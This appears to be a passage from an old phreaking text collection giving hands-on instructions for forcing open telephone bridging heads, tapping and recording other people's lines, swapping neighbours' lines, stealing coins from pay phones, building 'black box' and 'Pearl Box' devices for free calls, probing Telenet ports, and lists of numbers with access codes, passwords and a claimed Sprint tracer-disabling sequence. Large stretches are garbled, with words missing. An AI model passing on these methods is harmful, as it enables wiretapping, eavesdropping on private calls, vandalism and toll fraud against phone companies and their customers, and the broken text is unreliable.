Also, there is usually some kind of test equipment,
and often Bell test sets are left in there.
BRIDGING HEADS
The innocent-looking grayish-green boxes. These can be either trunk bridges or
bridging for residences. The major trunk bridging heads are usually larger, and
they have the 'Western Electric' logo at
the bottom, whereas the normal bridging heads (which may be different in some
areas-depending on the company you are served by. GTE B.H.'s look slightly
different. Also, do not be fooled by
sprinkler boxes!) They can be found in just about every city. To open a bridging
head: if it is locked (and you're feeling destructive), put a hammer or crowbar
(the same one you used on the manhole)
in the slot above the top hinge of the right door. Pull hard, and the door will
rip off. Very effective! If it isn't locked (as usual), take a 7/8 inch hex
socket and with it, turn the bolt about 1/8 of a turn to
the right (you should hear a spring release inside). Holding the bolt, turn the
handle all the way to the left and pull out. To Check for a test-set (which are
often left by Bell employees), go inside - First
check for a test-set (which are often left by Bell employees). There should be a
panel of terminals and wires. Push the panel back about an inch or so, and
rotate the top latch (round with a flat
section) downward. Release the panel and it will fall all the way forward. There
is usually a large amount of wire and extra terminals. The test-sets are often
hidden here, so don't overlook it (Manuals,
as well, are sometimes placed in the head). On the right door is a metal box of
alligator clips. Take a few (Compliments of Bell.). On each door is a useful
little round metal device. (Says 'insert gently'
or 'clamp gently - do not overtighten' etc..) On the front of the disc, you
should find two terminals. These are for your test set. (If you don't have one,
dont despair - I'll show you ways to make basic
test sets later in this article). Hook the ring (-) wire to the 'r' terminal;
and the tip (+) wire to the other. (By the way, an easy way to determine the
correct polarity is with a 1½v LED. Tap it to the term.
pair, if it doesn't light, switch the poles until it does. When it lights, find
the longer of the two LED poles: This one will be on the tip wire (+). Behind
the disc is a coiled up cord. This should have two
alligator clips on it.. Its very useful, because you don't have to keep
connecting and disconnecting the fone (test set) itself, and the clips work
nicely. On the terminal board, there should be about 10
screw terminals per side. Follow the wires, and you can see which cable pairs
are active. Hook the clips to the terminal pair, and you're set! Dial out if you
want, or just listen (If someone's on the line).
Later, I'll show you a way to set up a true 'tap' that will let the person dial
out on his line and receive calls as normal, and you can listen in the whole
time. More about this later... On major prefix-area
bridging heads, you can see 'local loops', which are two cable pairs (cable pair
= ring+tip, a fone line) that are directly connected to each other on the
terminal board. These 'cheap loops' as they are
called, do not work nearly as well as the existing ones set up in the switching
hardware at the exchange office. (Try scanning your prefixes æ00xx to 99xx #'s.)
The tone sides will announce themselves
with the 1008 hz loop tone, and the hang side will give no response. The first
person should dial the 'hang' side, and the other person dial the tone side, and
the tone should stop if you have got the
right loop.) If you want to find the number of the line that you're on, you can
either try to decipher the 'bridging log' (or whatever), which is on the left
door. If that doesn't work, you can use the
following:
ANI # (Automatic Number ID)
This is a Telco test number that reports to you the number that you're calling
from (It's the same, choppy 'Bell bitch' voice that you get when you reach a
disconnected number)
For the:
213 NPA - Dial 1223
408 NPA - Dial 760
914 NPA - Dial 990
These are extremely useful when messing with any kind of line terminals, house
boxes, etc. Now that we have bridging heads wired, we can go on... (don't forget
to close and latch the box after all...
Wouldn't want GE and Telco people mad, now, would we?)
"CANS" - Telephone Distribution Boxes
Basically, two types:
1. Large, rectangular silver box at the end of each street.
2. Black, round, or rectangular thing at every telephone pole.
Type 1 - This is the case that takes the underground cable from the bridge and
runs it to the telephone pole cable (The lowest, largest one on the telephone
pole.) The box is always on the pole nearest
the bridging head, where the line comes up. Look for the 'Call before you Dig -
Underground cable' stickers.. The case box is hinged, so if you want to climb
the pole, you can open it with no
problems. These usually have 2 rows of terminal sets. You could try to
impersonate a Telco technician and report the number as 'new active' (giving a
fake name and fake report, etc.) I don't
recommend this, and it probably won't (almost positively won't) work, but this
is basically what Telco linemen do.)
Type 2 - This is the splitter box for the group of houses around the pole
(Usually 4 or 5 houses). Use it like I mentioned before. The terminals (8 or so)
will be in 2 horizontal rows of sets. The extra
wires that are just 'hanging there' are provisions for extra lines to residences
(1 extra line per house, that's why the insane charge for line #3!) If its the
box for your house also, have fun and swap lines
with your neighbor! 'Piggyback' them and wreak havoc on the neighborhood (It's
eavesdropping time...) Again, I don't recommend this, and its difficult to do it
correctly. Moving right along...
APARTMENT / BUSINESS MULTI-LINE DISTRIBUTION BOXES
Found outside the building (most often on the right side, but not always... Just
follow the wire from the telephone pole) or in the basement. It has a terminal
for all the lines in the building. Use it just like
any other termination box as before. Usually says 'Bell system' or similar. Has
up to 20 terminals on it (usually.) the middle ones are grounds (forget these).
The wires come from the cable to one row
(usually the left one), with the other row of terminals for the other row of
terminals for the building fone wire pairs. The ring (-) wire is usually the top
terminal if the set in the row (1 of 10 or more), and
the tip is
in the clamp/screw below it. This can be reversed, but the cable pair is always
terminated one-on-top-of-each- other, not on the one next to it. (I'm not sure
why the other one is there, probably as a
provision for extra lines) Don't use it though, it is usually to close to the
other terminals, and in my experiences you get a noisy connection.
Final note: Almost every apartment, business, hotel, or anywhere there is more
than 2 lines this termination lines this termination method is used. If you can
master this type, you can be in control of
many things... Look around in your area for a building that uses this type, and
practice hooking up to the line, etc. As an added help, here is the basic
'standard' color-code for multi-line
terminals/wiring/etc...
Single line: Red = Ring
Green = Tip
Yellow = Ground *
*Connected to the ringer coil in individual and bridged ringer phones (Bell
only) Usually connected to the green (Tip)
Ring (-) = Red
White/Red Stripe
Brown
White/Orange Stripe
Black/Yellow Stripe
Tip (+) = Green (Sometimes yellow, see above.)
White/Green Stripe
White/Blue Stripe
Blue
Black/White Stripe
Ground = Black
Yellow
RESIDENCE TERMINAL BOX
Small, gray (can be either a rubber (Pacific Telephone) or hard plastic (AT&T)
housing deal that connects the cable pair from the splitter box (See type 2,
above) on the pole to your house wiring.
Only 2 (or 4, the 2 top terminals are hooked in parallel with the same line)
terminals, and is very easy to use. This can be used to add more lines to your
house or add an external line outside the house.
TEST SETS
Well, now you can consider yourself a minor expert on the terminals and wiring
of the local telephone network. Now you can apply it to whatever you want to
do.. Here's another helpful item:
How to make a Basic Test-Set and how to use it to dial out, eavesdrop, or
seriously tap and record line activity. These are the (usually) orange hand set
fones used by Telco technicians to test lines. To
make a very simple one, take any Bell (or other, but I recommend a good Bell
fone like a princess or a trimline. GTE flip fones work excellently, though..)
fone and follow the instructions below.
Note: A 'black box' type fone mod will let you tap into their line, and with the
box o, it's as if you weren't there. They can receive calls and dial out, and
you can be listening the whole time! Very useful.
With the box off, you have a normal fone test set.
Instructions:
A basic black box works well with good results. Take the cover off the fone to
expose the network box (Bell type fones only). The <RR> terminal should have a
green wire going to it (orange or
different if touch tone - doesn't matter, its the same thing). Disconnect the
wire and connect it to one pole of an SPST switch. Connect a piece of wire to
the other pole of the switch and connect it to
the <RR> terminal. Now take a 10kohm ½ watt 10% resistor and put it between the
<RR> terminal ad the <F> terminal, which should have a blue and a white wire
going to it (different for touch
tone). It should look like this:
-----Blue wire----------<F>
!
----White wire-----!
!
10k Resistor
!
!
--Green wire-- !----<RR>
! !
SPST
What this does in effect is keep the hookswitch / dial pulse switch (F to RR
loop) open while holding the line high with the resistor. This gives the same
voltage effect as if the fone was 'on-hook', while
the 10k ohms holds the voltage right above the 'off hook' threshold (around 22
volts or so, as compared to 15-17 or normal off hook 48 volts for normal
'on-hook'), giving Test Set Version 2.
Another design is similar to the 'Type 1' test set (above), but has some added
features:
From >----------------Tip------<To Test
Alligator set
Clip >----------------Ring-----<phone
!
x
o x---RRRRR---!
!---x
x----0------! Switch LOD 0 = Green LED
RRRRR= 1.8k ½ watt xxxx= Dpst
resistor
When the SPST in on, will light, and fone become active. green light should be
on. If it isn't, dpst. still check polarity of line LEDs. With both lights hang
up fone. They all off now. Now flip dpst pick
red but shouldn't. is, something is wrong circuit. You wont get a dial tone
correct. hook to alligator clips (Assuming have put this circuit inside our on
ring tip wires (As we did before)) #1 position.
greatly reduce static noise involved hooking line. can also used correct
polarity. ability listen audible activity, people (the 'eavesdroppers use their
as normal. Note that test sets #2 true 'black boxes for
free calls (see an article about boxes). Set Version 3
Using trimline (or similar) phone, remove base cut wire leads except (ring -)
(tip +). Solder lug. itself 'tinsel' wrapped rayon, doesn't well. one handset,
socket (if has one) install small slide or toggle
(Radio Shack's micro-miniature works well). Locate connection PC board near
where jack located at bottom handset. are sometimes brow instead green,
respectively). foil run 2 pieces your switch.
parallel add ¼ uf 200 VDC capacitor (mylar, silvered mica, ceramic, not
electrolytic). closed, handset functions normally. other position, without being
heard.
Note: connecting line, selectable 1000 ohm series wire. connecting, once again.
just disconnect' type (above)). avoid touching any metal parts terminals, I
causes raises suspicions.
RECORDING would like record 1 above (for unattended activity), going there
monitor dialing, talking, etc. Place telephone pickup coil (I recommend Becoton
T-5 TP equivalent) onto set, plug into
mic. standard tape recorder. Hit play, rec, pause. Alternate pause want don
think anyone difficulty all...) Well, make parts, hope. methods:
1. Find bell manhole bridging head 'Borrow indefinitely'...
2. purchased from:
Techni-Tool
5 Apollo Road
Box 368
Plymouth Meeting PA., 19462
Ask catalog #28 usually $300 - $600, supposed M-F dialing capability well TT
dialing. much higher quality than sets. learn more subjects covered here,
suggest: Follow trucks linemen
technicians subtle questions. try 611 (repair service) questions.. Explore area
hardware, experiment it. sure what're doing, because wouldn cause problems, you?
95. Getting Money out Pay Phones by Jolly Roger share my experiences telephones.
discover possible from phone minimum effort. Theory: Most four transmission data
codes central
office. Two them voice (usually green), ground, last others codes. working with.
to, was colored purple, likely another color. do simply which exposed wires,
such disconnected connected ease fear
discovery. good idea some electrical along tool cutting tape. Through trial
error, time starting different red. during operation. supplying company so 'busy
'hang-up' command. Leave happen: Anytime
someone puts amount deposit register held 'temporary' chamber phone. Then, (a
day later so) come back reconnect wire, click few times dump chute. (What
happening' code receiving due suddenly
gets
dumps its' storage spot.) nice way, remember repairman stop every reported
broken repair it, least day. Enjoy fun.. Many done each..
96. Computer Based PBX better understanding do, here basic fundamentals. modern
combined computer, mass device, course switching system can: Produce itemized,
automated billing
procedures, allow identification management toll calls. [hahaha] Combine daytime
grade communication circuits wideband channels night high speed transfers.
3. Handles electronic mail [including office memos].
4. audio/visual conference circuit, xfer capture slides, flipcharts, pictures
kind. external internal calling capacity must carefully considered business
operations very ratio station low handle requested
traffic load. critical factor number trunks facilities outside connections.
junctions [links] paths. understand services available typical necessary
introduce subject division switching. network connections
made via single common bus called (of course) 'time-division trunk requires
provided port access [when ports require connection, switches operate frequency
(16,000 per second.) technique, 'speech
sampling', allows simultaneous over same bus. Each assigned interval, slot slots
identifies among ports.] next item packs. elements describing future tutorials
[lines/switches, memory control] contained
pack contains lines, example, four. assignment numbers actual flexible. packs
provide call processing functions. frames 'carriers'. Within carrier, plugged
positions: addressed by, say five digit tells
location carrier-slot-circuit.... [starting idea?] three types system:
· control contain lines. AT&T "dimension" model, total 52 64 lines provided. 16
carrier includes processor, memory, circuitry, attendant console measurement
outputs. systems directly reflect offered
c.o. ccsa ccis picturephones [sooner phriends] arrangements (ccsa) permit
unrestricted seven number. routing feature service inter-facility, routed paths
accomplished level, level. interest large scale
users channel interoffice signaling ccis. Typically, technique employs carry
inter-facility instructions: pulses, (idle), (busy),and between centers.
[getting warm]. replaces older methods band' techniques.
real phreaks selling idiots who worth lot...the former (in band) transmits
normal conversation bandwidth. ItÆs shortcoming false information may
transmitted unique combinations talking path. [this
official reasoning]. techniques placed special channels, generally adjacent
immediately preserve interchannel integrity, efficient filtering greater guard'
separation channels.
97. PC-Pursuit Statistics
Introduction: 30 days been extremely controversial. ex-users demanded accurate
statistics, Telenet us little. questionable. guaranteed scream. wish update own,
tell how text. following chart consists
direct addresses city nodes modems node. means:
NJNEW/3 2011 .12 56 \-- \- Suffix Address sequence. Prefix. \--- Baud Rate 300.
\--------- Mnemonic.
Please several perfectly legal ways connect C D/3,PCP10000,><password> [HUNT]
2. C 2011,PCP10000,<password> [HUNT]
3. C 2011.10,PCP10000,<password> [NON HUNT]
The first, is self explanatory. The second does the same thing as the first,
only that it is slightly faster and gives the user much greater flexibility. The
third is an example the flexibility, because a request
is made to connect to the tenth, and only the tenth, modem on the NJNEW/3 port.
By simply attempting to connect to every single modem in the 2011 chain, we were
able to count the number of
modems on each port and come up with the following charts which were extracted
on June the twenty ninth of the year 1989:
Rotary Port Direct Address Max. Range City Total Rotary Port Direct Address Max.
Range City Total
NJNEW/3 2011 .12 56 CAOAK/3 4155 .4 16
/12 201301 .4 /12 415216 .8
/24 20122 .4 /24 41511 .4
DCWAS/3 202115 .6 46 CAPAL/3 415106 .4 12
/12 202116 .24 /12 415224 .8
/24 202117 .16 /24 NONE NONE
CTHAR/3 NONE NONE 8 CASFA/3 415215 .6 20
/12 203120 .8 /12 415217 .10
/24 NONE NONE /24 41523 .4
WASEA/3 20617 .4 30 ORPOR/3 50320 .2 8
/12 20619 .22 /12 50321 .6
/24 20621 .4 /24 NONE NONE
NYNYO/3 212315 .4 22 AZPHO/3 60222 .4 20
/12 212316 .14 /12 60223 .12
/24 21228 .4 /24 60226 .4
CALAN/3 213412 .8 40 MNMIN/3 612120 .4 22
/12 213413 .28 /12 612121 .14
/24 21323 .4 /24 61222 .4
TXDAL/3 214117 .6 30 MABOS/3 617311 .4 32
/12 214118 .22 /12 617313 .20
/24 21422 .4 /24 61726 .8
PAPHI/3 215112 .6 36 TXHOU/3 713113 .8 42
/12 2155 .22 /12 713114 .24
/24 21522 .8 /24 71324 .1
OHCLE/3 21620 .4 26 CACOL/3 71423 .4 18
/12 21621 .18 /12 7144 .1
/24 216120 .4 /24 71424 .4
CODEN/3 303114 .4 40 CASAN/3 714119 .4 20
/12 303115 .18 /12 714213 .12
/24 30321 .22 /24 714124 .4
FLMIA/3 305120 .6 28 CASDI/3 714102 .4 22
/12 305121 .18 (619)/12 714210 .14
/24 305122 .4 /24 714121 .4
ILCHI/3 312410 .8 40 UTSLC/3 80120 .4 22
/12 312411 .28 /12 80121 .14
/24 31224 .4 /24 80112 .4
MIDET/3 313214 .6 30 FLTAM/3 81320 .4 18
/12 313216 .18 /12 81321 .1
/24 31324 .6 /24 813124 .4
MOSLO/3 3145 .4 16 MOKCI/3 816104 .4 20
/12 314421 .8 /12 816221 .12
/24 31420 .4 /24 816113 .4
GAATL/3 404113 .8 32 CAGLE/3 NONE NONE ??
/12 404114 .20 /12 81821 .18
/24 40422 .4 /24 NONE NONE
CASJO/3 408111 .4 34 CASAC/3 9167 .4 16
/12 40821 .26 /12 91611 .8
/24 408110 .4 /24 91612 .4
WIMIL/3 41420 .4 24 NCRTP/3 91920 .4 20
/12 41421 .16 /12 91921 .12
/24 414120 .4 /24 919124 .4
NOTE: CASAC/3, CASAC/24 were estimated.
PC-Pursuit Modems Statistics Chart
Number of Modems - 01/29/89
Mnemonic 300 1200 2400 Total
NJNEW 12 40 4 56
DCWAS 6 24 16 46
CTHAR 0 8 0 8
WASEA 4 22 4 30
NYNYO 4 14 4 22
CALAN 8 28 4 40
TXDAL 6 22 4 32
PAPHI 6 22 8 36
OHCLE 4 18 4 26
CODEN 4 18 22 44
FLMIA 6 18 4 28
ILCHI 8 28 4 40
MIDET 6 18 6 30
MOSLO 4 8 4 16
GAATL 8 20 4 32
CASJO 4 26 4 34
WIMIL 4 16 4 24
CAOAK 4 8 4 16
APAL 4 8 0 12
CASFA 6 10 4 20
ORPOR 2 6 0 8
AZPHO 4 12 4 20
MNMIN 4 14 4 22
MABOS 4 20 8 32
TXHOU 8 24 10 42
CACOL 4 10 4 18
CASAN 4 12 4 20
CASDI 4 14 4 22
UTSLC 4 14 4 22
FLTAM 4 10 4 18
MOKCI 4 12 4 20
CAGLE 4 18 4 26
CASAC 4 8 4 16
NCRTP 4 12 4 20
Total 166 562 170 898
Average 4.8823529 16½29412 5 26.411765
I think the statistics basically speak for themselves. I am sure there will no
doubt be hundreds of people who will not smile at the number of specific kinds
of ports supported, not to mention the number
of 'dead' or 'down' modems you will find when you verify the totals. Usually, 2%
to perhaps 10% of the modems are 'dead' with specific ones repeatedly failing
week after week.
History Of This Collection:
Almost a year ago a small selected group of devoted individuals got together to
discuss problems with the PC-Pursuit Network, in the middle of our discussions a
question was asked as to how the
network really processes our calls. This was intended to help us assess SET
commands and other such matters. When the address hypothesis was offered we
quickly set out to prove it. It was proved
in about 3 minutes with the discovery of 2011 (First try was xxx1). The data has
continually been collected and analyzed ever since, but until now, has never
been mass released.
A small group of teen age hackers discovered several interesting things that can
be done with these addresses -- many of which will not be discussed here short
of mentioning that these ports connected
to via these addresses are not limited to PC-Pursuiters. You can, however, fight
"dead" dialout modems in cities via the address method. Dead modems can be
located in about 10 seconds (faster than
Telenet), and can either be reported or skipped past by the user connecting to
the next modem in the sequence after the "dead" one. (Note: Say 2011.3 is dead,
connect to 2011.4 and you will be past
it. If 2011.4 is busy, go to 2011½. The reader should notice 2011.3 is the same
as 2011C.)
The most interesting value of these addresses is that one can count the number
of ports that Telenet keeps so secret (Grin). When there were only 28 cities in
operation there were an average of 2.7
300 baud, 9.4 1200 baud, and 2½ 2400 baud modems in each city. Some cities had
as little as 2 modems on a port and as many as 12. Only recently has the number
of modems per city begun to
jump.
How To Update The Count Yourself:
An ID is not required to "request" one of these ports, thus the tallying can be
done any time of day by simply typing the number at the @ prompt. Here is an
example with four modems (NJNEW/24):
@20122.1
201 22A REFUSED COLLECT CONNECTION 19 80
@20122.2
201 22B REFUSED COLLECT CONNECTION 19 80
@20122.3
201 22C REFUSED COLLECT CONNECTION 19 80
@20122.4
201 22D REFUSED COLLECT CONNECTION 19 80
@20122½
201 22E ILLEGAL ADDRESS 19 80
The reader should be aware that PC-Pursuit ports always respond with '19 80'. Do
not confuse it with '19 00', which are not PC-Pursuit ports. In the above
example we know there are four ports
because the forth was the last existing port before we encountered the 'ILLEGAL
ADDRESS.' There are several ways to signify that you have gone one beyond the
end of the ports:
1. xxx xxx ILLEGAL ADDRESS 19 80
2. xxx xxx NOT OPERATING 19 80
3. The request freezes (Note: Issue a BREAK then D <C/R> to abort the attempt
yielding 'ATTEMPT ABORTED'.)
You should be aware that modems which are out of order in the middle of the
sequence can respond with 'NOT OPERATING' or may freeze the request. You should
also note that when updating the
existing list, all you need to do is try to request the next modem beyond the
end as of the last check.
Finding Newly Added Ports:
Many ports have not yet been installed; hence, we do not yet know the addresses.
New ports may be found by entering the first three digits of the area code and
appending (1-29, 101-129, 201-229,
301-329, etc.) until the 'REFUSED COLLECT CONNECTION 19 80' appears. Once this
is found, simply log onto the port address with your ID and R/V dial some silly
series of digits,
disconnect the port, then connect to the PC-Pursuit mnemonic you think it might
be and R/V redial the last number. If the numbers match, you found it.
98. Pearl Box Plans by The Jolly Roger
The Pearl Box: Definition - This is a box that may substitute for many boxes
which produce tones in hertz. The Pearl Box when operated correctly can produce
tones from 1-9999hz. As you can see,
2600, 1633, 1336 and other crucial tones are obviously in its sound spectrum.
Materials you will need:
1. C1, C2:½mf or ½uf ceramic disk capacitors
2. Q1.....NPN transistor (2N2222 works best)
3. S1.....Normally open momentary SPST switch
4. S2.....SPST toggle switch
5. B1.....Standard 9-Volt battery
6. R1.....Single turn, 50k potentiometer
7. R2.....Single turn, 100k potentiometer
8. R3.....Single turn, 500k potentiometer
9. R4.....Single turn, 1Meg potentiometer
10. SPKR...Standard 8-ohm speaker
11. T1.....Mini transformer (8-ohm works best)
12. Misc...Wire, solder, soldering iron, PC board or perfboard, box to contain
the completed unit, battery clip
Instructions for building Pearl Box:
Since the instruction are EXTREMELY difficult to explain in words, you will be
given a schematic instead. It will be quite difficult to follow but try it any
way.
(Schematic for The Pearl Box)
+---+------------+---------+
! ! \
C1 C2 \
! ! +
+ + -----+T1
!\ +------------+-+
! b c-------! +
! Q1 ! +-S1-
! e-----S2---+ ! SPKR
! ! ! +----
! B1 !
! ! !
! +-------+
!R1 R2 R3 R4!
/\/\ /\/\ /\/\ /\/\
+--+ +--+ +--+
Now that you are probably thoroughly confused, let me explain a few minor
details. The potentiometer area is rigged so that the left pole is connected to
the center pole of the potentiometer next to it.
The middle terminal of T1 is connected to the piece of wire that runs down to
the end of the battery.
Correct operation of The Pearl Box:
You may want to get some dry-transfer decals at Radio Shack to make this job a
lot easier. Also, some knobs for the tops of the potentiometers may be useful
too. Use the decals to calibrate the
knobs. R1 is the knob for the ones place, R2 is for the tens place, R3 if for
the hundreds place and R4 is for the thousands place. S1 is for producing the
all the tones and S2 is for power.
1. Turn on the power and adjust the knobs for the desired tone.
(Example: For 2600 hz-R1=0:R2=0:R3=6:R4=2)
2. Hit the push-button switch and VIOLA! You have the tone. If you don't have a
tone recheck all connections and schematic.
99. The Phreak file by The Jolly Roger
202 282 3010 UNIV. OF D.C.
202 553 0229 PENTAGON T.A.C.
202 635 5710 CATHOLIC UNIV. OF AMERICA
202 893 0330 DEFENSE DATA NETWORK
202 893 0331 DEFENSE DATA NETWORK
202 965 2900 WATERGATE
203 771 4930 TELEPHONE PIONEERS
206 641 2381 VOICE OF CHESTER
212 526 1111 NEW YORK FEED LINE
212 557 4455 SEX HOT LINE
212 799 5017 ABC NY FEED LINE
212 934 9090 DIAL-AN-IDIOT
212 976 2727 P.D.A.
212 986 1660 STOCK QUOTES
213 541 2462 STOCK MARKET REPORTS
213 547 6801 NAVY SHIPS INFO
213 576 6061 " "
213 664 3321 NEWS FOR THE BLIND
301 393 1000 " "
301 667 4280 LOTTERY INFO
312 939 1600 " "
404 221 5519 NUCLEAR COMMISSION
408 248 8818 1ST NATIONAL BANK
415 642 2160 EARTHQUAKE REPORT
505 883 6828 " "
512 472 2181 " "
512 472 4263 WEIRD RECORDING
512 472 9833 " "
512 472 9941 INSERT 25 CENTS
512 472 9941 SPECIAL RECORDING
512 870 2345 " "
516 794 1707 " "
619 748 0002 LOOP LINE
619 748 0003 " "
703 331 0057 MCI (5 DIGITS)
703 334 6831 WASH. POST
703 354 8723 COMPEL INC.
703 737 2051 METROPHONE (6 DIGITS)
703 835 0500 VALNET (5 DIGITS)
703 861 7000 SPRINT (6/8 DIGITS)
703 861 9181 SPRINT (6/8 DIGITS)
714 974 4020 CA. MAINFRAME
716 475 1072 N.Y. DEC-SYSTEM
800 222 0555 RESEARCH INSTITUTE
800 223 3312 CITIBANK
800 227 5576 EASTERN AIRLINES
800 248 0151 WHITE HOUSE PRESS
800 321 1424 FLIGHT PLANES
800 323 3026 TEL-TEC (6 GIGITS)
800 323 4756 MOTOROLA DITELL
800 323 7751 MCI MAINFRAME
800 325 4112 EAsYLINK
800 325 6397 FYI
800 344 4000 MSG SYSTEM
800 368 6900 SKYLINE ORDER LINE
800 424 9090 RONALD REAGAN'S PRESS
800 424 9096 WHITE HOUSE SWITCH
800 438 9428 ITT CITY CALL SWITCHING
800 521 2255 AUTONET
800 521 8400 TRAVELNET (8 DIGITS)
800 526 3714 RCA MAINFRAME
800 527 1800 TYMNET
800 621 3026 SPECIAL OPERATOR
800 621 3028 " "
800 621 3030 " "
800 621 3035 " "
800 631 1146 VOICE STAT
800 821 2121 BELL TELEMARKETING
800 828 6321 XEROX $
800 858 9313 RECORD-A-VOICE
800 882 1061 AT&T STOCK PRICES
914 997 1277 " "
916 445 2864 JERRY BROWN
N/A 950 1000 SPRINT
N/A 950 1022 MCI EXECUNET
N/A 950 1033 US TELEPHONE
N/A 950 1044 ALLNET (6 DIGITS)
N/A 950 1066 LEXITEL
N/A 950 1088 SKYLINE (6 DIGITS)
-----------------------------------
PHONE # | DESCRIPTION/CODE
-----------------------------------
201-643-2227 | CODES:235199, 235022 AND 121270
|
800-325-4112 | WESTERN UNION
|
800-547-1784 | CODES:101111, 350009 AND 350008
|
800-424-9098 | TOLL FREE WHITE HS.
|
800-424-9099 | DEFENSE HOT LINE
|
202-965-2900 | WATERGATE
|
800-368-5693 | HOWARD BAKER HOTLINE
|
202-456-7639 | REAGANS SECRETARY
|
202-545-6706 | PENTAGON
|
202-694-0004 | PENTAGON MODEM
|
201-932-3371 | REUTERS
|
800-325-2091 | PASSWORD: GAMES
|
800-228-1111 | AMERICAN EXPRESS
|
617-258-8313 | AFTER CONNECT PRESS CTRL-C
|
800-323-7751 | PASSWORD:REGISTER
|
800-322-1415 | CODES:266891, 411266 AND 836566 (USED BY SYSOP)
The following 800 #'s have been collected however no codes have been found yet!
if you hack any please let me know...
-----------------------------------
phone # | codes:
-----------------------------------
800-321-3344 | ???????????
800-323-3027 | ???????????
800-323-3208 | ???????????
800-323-3209 | ???????????
800-325-7222 | ???????????
800-327-9895 | ???????????
800-327-9136 | ???????????
800-343-1844 | ???????????
800-547-1784 | ???????????
800-547-6754 | ???????????
800-654-8494 | ???????????
800-682-4000 | ???????????
800-858-9000 | ???????????
800 numbers with carriers.
800-323-9007
800-323-9066
800-323-9073
800-321-4600
800-547-1784
1-800 numbers of the government.
800-321-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION
CNTR1-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION CNTR.
800-325-4072:COMBAT & ARMS SERVICE.
800-325-4095:COMBAT SUPPORT BRANCH.
800-325-4890:ROPD USAR COMBAT ARMS.
800-432-3960:SOCIAL SECURITY.
800-426-5996:PUGET NAVAL SHIPYARD.
Directory of toll free numbers.
800-432-3960:SOCIAL SECURITY.
800-426-5996:PUGET NAVAL SHIPYARD.
Directory of toll free numbers.
301-234-0100:BALTIMORE ELECTRIC.
202-456-1414:WHITE HOUSE.
202-545-6706:PENTAGON.
202-343-1100:EPA.
714-891-1267:DIAL-A-GEEK.
714-897-5511:TIMELY.
213-571-6523:SATANIC MESSAGES.
213-664-7664:DIAL-A-SONG.
405-843-7396:SYNTHACER MUSIC.
213-765-1000:LIST OF MANY NUMBERS.
512-472-4263:WIERD.
512-472-9941:INSERT 25.
203-771-3930:PIONEERS.
213-254-4914:DIAL-A-ATHIEST.
212-586-0897:DIRTY.
213-840-3971:HOROWIERD
203-771-3930:PIONEERS
471-9420,345-9721,836-8962
836-3298,323-4139,836-5698
471-9440,471-9440,471-6952
476-6040,327-9772,471-9480
800-325-1693,800-325-4113
800-521-8400:VOICE ACTIVATED
213-992-8282:METROFONE ACCESS NUMBER
617-738-5051:PIRATE HARBOR
617-720-3600:TIMECOR #2
301-344-9156:N.A.S.A PASSWORD:GASET
318-233-6289:UNIVERSITY LOUISIANA
213-822-2112:213-822-3356
213-822-1924:213-822 3127
213-449-4040:TECH CENTER
213-937-3580:TELENET
1-800-842-8781
1-800-368-5676
1-800-345-3878
212-331-1433
213-892-7211
213-626-2400
713-237-1822
713-224-6098
713-225-1053
713-224-9417
818-992-8282
1-800-521-8400
After entering the sprint code, and, C+Destination number. Then enter this
number: ô205#977#22", And the main tracer for sprint will be disabled.
215-561-3199/SPRINT LONG DISTANCE
202-456-1414/WHITE HOUSE
011-441-930-4832/QUEEN ELIZABETH
916-445-2864/JERRY BROWN
800-424-9090/RONALD REAGAN'S PRESS
212-799-5017/ABC NEW YORK FEED LINE
800-882-1061/AT & T STOCK PRICES
212-986-1660/STOCK QUOTES
213-935-1111/WIERD EFFECTS!
512-472-4263/WIERD RECORDING
212-976-2727/P.D.A.
619-748-0002/FONE CO. TESTING LINES
900-410-6272/SPACE SHUTTLE COMM.
201-221-6397/AMERICAN TELEPHONE
215-466-6680/BELL OF PENNSYLVANIA
202-347-0999/CHESAPEAKE TELEPHONE
213-829-0111/GENERAL TELEPHONE
808-533-4426/HAWAIIAN TELEPHONE
312-368-8000/ILLINOIS BELL TELEPHONE
317-265-8611/INDIANA BELL
313-223-7233/MICHIGAN BELL
313-223-7223/NEVADA BELL
207-955-1111/NEW ENGLAND TELEPHONE
201-483-3800/NEW JERSEY BELL
212-395-2200/NEW YORK TELEPHONE
515-243-0890/NORTHWESTERN BELL
216-822-6980/OHIO BELL
206-345-2900/PACIFIC NORTHWEST BELL
213-621-4141/PACIFIC TELEPHONE
205-321-2222/SOUTH CENTRAL BELL
404-391-2490/SOUTHERN BELL
203-771-4920/SOUTHERN NEW ENGLAND
314-247-5511/SOUTHWESTERN BELL
414-678-3511/WISCONSIN TELEPHONE
800-327-6713/UNKNOWN ORIGIN
303-232-8555/HP3000
315-423-1313/DEC-10
313-577-0260/WAYNE STATE
512-474-5011/AUSTIN COMPUTERS
516-567-8013/LYRICS TIMESHARING
212-369-5114/RSTS/E
415-327-5220/NEC
713-795-1200/SHELL COMPUTERS
518-471-8111/CNA OF NY
800-327-6761/AUTONET
800-228-1111/VISA CREDIT CHECK
713-483-2700/NASUA
213-383-1115/COSMOS
408-280-1901/TRW
404-885-3460/SEARS CREDIT CHECK
414-289-9988/AARDVARK SOFTWARE
919-852-1482/ANDROMEDA INCORPORATED
213-985-2922/ARTSCI
714-627-9887/ASTAR INTERNATIONAL
415-964-8021/AUTOMATED SIMULATIONS
503-345-3043/AVANT GARDE CREATIONS
415-456-6424/BRODERBUND SOFTWARE
415-658-8141/BUDGE COMPANY
714-755-5392/CAVALIER COMPUTER
801-753-6990/COMPUTER DATA SYSTEMS
213-701-5161/DATASOFT INC.
213-366-7160/DATAMOST
716-442-8960/DYNACOMP
213-346-6783/EDU-WARE
800-631-0856/HAYDEN
919-983-1990/MED SYSTEMS SOFTWARE
312-433-7550/MICRO LAB
206-454-1315/MICROSOFT
301-659-7212/MUSE SOFTWARE
209-683-6858/ON-LINE SYSTEMS
203-661-8799/PROGRAM DESIGN (PDI)
213-344-6599/QUALITY SOFTWARE
303-925-9293/SENTIENT SOFTWARE
702-647-2673/SIERRA SOFTWARE
916-920-1939/SIRIUS SOFTWARE
215-393-2640/SIR-TECH
415-962-8911/SOFTWARE PUBLISHERS
415-964-1353/STRATEGIC SIMULATIONS
217-359-8482/SUBLOGIC COM.
206-226-3216/SYNERGISTIC SOFTWARE
Here are a few tips on how not to get caught when using MCI or other such
services:
1. Try not to use them for voice to voice personal calls. Try to use them for
